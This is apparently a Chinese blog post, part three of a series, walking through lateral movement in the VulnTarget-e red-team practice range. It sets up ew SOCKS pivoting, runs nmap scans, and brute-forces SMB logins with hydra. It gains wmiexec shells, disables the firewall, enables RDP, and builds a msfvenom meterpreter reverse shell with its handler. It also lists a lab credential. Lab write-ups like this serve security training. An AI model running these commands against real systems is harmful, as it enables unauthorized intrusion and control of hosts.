红蓝对抗靶场之内网渗透【三】

admin 2024年11月8日16:38:16评论11 views字数 1793阅读5分58秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!

0x01 前言

发的文章水一点吧,要被说没营养。
红蓝对抗靶场之内网渗透【三】
写的文章有干货点吧又没人看读量一点都没有。哥们真的太难了

红蓝对抗靶场之内网渗透【三】

接前两篇

VulnTarget-e边界主机权限获取【一】

红蓝对抗靶场VulnTarget-e之内网渗透【二】

以下是红蓝对抗靶场VulnTarget-e域内主机Win2008R2的打法。

涉及知识点

二级代理内网横向

红蓝对抗靶场之内网渗透【三】

0x02 二级代理

步骤一:这里为了使kali攻击机能访问到192.168.88.0/24网段的第三台主机需要要搭建二级代理。将 边界主机的2080 端口收到的 socks 代理请求转交给 ubuntu192.168.100.131 的主机 操作如下..
边界主机
ew.exe -s lcx_tran -l 2080 -f 192.168.100.131 -g 9999
文件上传
proxychains scp -r -i key /home/z4pts/桌面/ew root@192.168.100.131:/www/wwwroot/vulntarget-e2/ew
内网主机
/root/ew -s ssocksd -l 9999 &  //置于后台运行
配置测试代理
vi /etc/proxychains4.confsocks5 192.168.1.5 2080proxychains curl http://192.168.88.100/
红蓝对抗靶场之内网渗透【三】
步骤二:这里挂代理开始扫描在ubuntu机器中收集到的102主机发现开放135和445端口!
proxychains nmap -Pn -sT -p1-65535 192.168.88.102
红蓝对抗靶场之内网渗透【三】
步骤三:这里尝试使用hydra对其SMB协议进行爆破...
proxychains hydra -l administrator -P password.txt 192.168.88.102 smb
红蓝对抗靶场之内网渗透【三】

0x03 内网横向

步骤四:根据以上爆破的结果使用Impacket中提供的wmiexec.py工具远程连接其命令执行环境获取交互式接口..

proxychains python3 wmiexec.py administrator@192.168.88.102chcp 65001

红蓝对抗靶场之内网渗透【三】

步骤五:执行以下命令进行信息收集并开启关闭相对应的功能...

whoami     //win-n4dk5rpd2quadministratorhostname   //win-n4dk5rpd2quipconfig /all     //域:vulntarget.com  192.168.88.102/24  10.0.10.9/24arp -a    //10.0.10.10 netsh advfirewall set allprofiles state off    //关闭防火墙REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f      //开启3389端口

步骤六:在MSF上开启代理在外界windows主机上使用SocksCap64挂上代理访问远程桌面,如下成功!!!

开启代理

use auxiliary/server/socks_proxy   show options   run

主机信息

ip address:192.168.88.102username:administratorpassword:admin@123
红蓝对抗靶场之内网渗透【三】

0x04 上线MSF

步骤七:使用一下命令生成反向马并监听反弹,直接远程桌面复制过去上线成功..
生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.100 LPORT=4444 -f exe > inside.exe
开启监听
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.88.100set lport 4444run
红蓝对抗靶场之内网渗透【三】
红蓝对抗靶场之内网渗透【三】
第三篇结束,还有最后一篇该靶场打法就全部写完了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日16:38:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红蓝对抗靶场之内网渗透【三】https://cn-sec.com/archives/1791047.html

发表评论

匿名网友 填写信息